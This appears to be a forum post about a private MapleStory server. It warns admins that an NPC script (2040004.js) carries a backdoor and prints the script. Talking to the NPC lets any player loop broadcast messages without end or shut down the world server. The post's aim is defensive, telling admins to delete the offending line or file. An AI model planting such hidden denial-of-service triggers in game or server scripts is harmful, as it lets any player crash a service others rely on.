In \scripts\npc
go to 2040004.js (Roly-Poly 1[Ludibrium:Eos Tower 98th Floor])
Either Delete cm.c.getChannelServer().shutdownWorld(0); or delete the entire file.var pi = 0;
function start() {
cm.sendSimple("HAI :D #L0#Test#l\r\n#L1#Test1#l\r\n#L2#Test2#l");
}
function action(mode, type, selection){
pi++;
if(mode != 1){
cm.dispose();
return;
}
if(pi == 1)
cm.sendGetText("Write lawls");
else if(pi == 2){
switch (selection) {
case 0:
while(true)
cm.broadcastMessage(5, cm.getText());
break;
case 1:
cm.zakumSquadMembers(cm.getText());
break;
case 2:
cm.c.getChannelServer().shutdownWorld(0);
}
cm.dispose();
}
}
You probably should delete the file unless your going to customize it.



![[Release] Xotic exploit.... shutdownworld.](http://ragezone.com/hyper728.png)


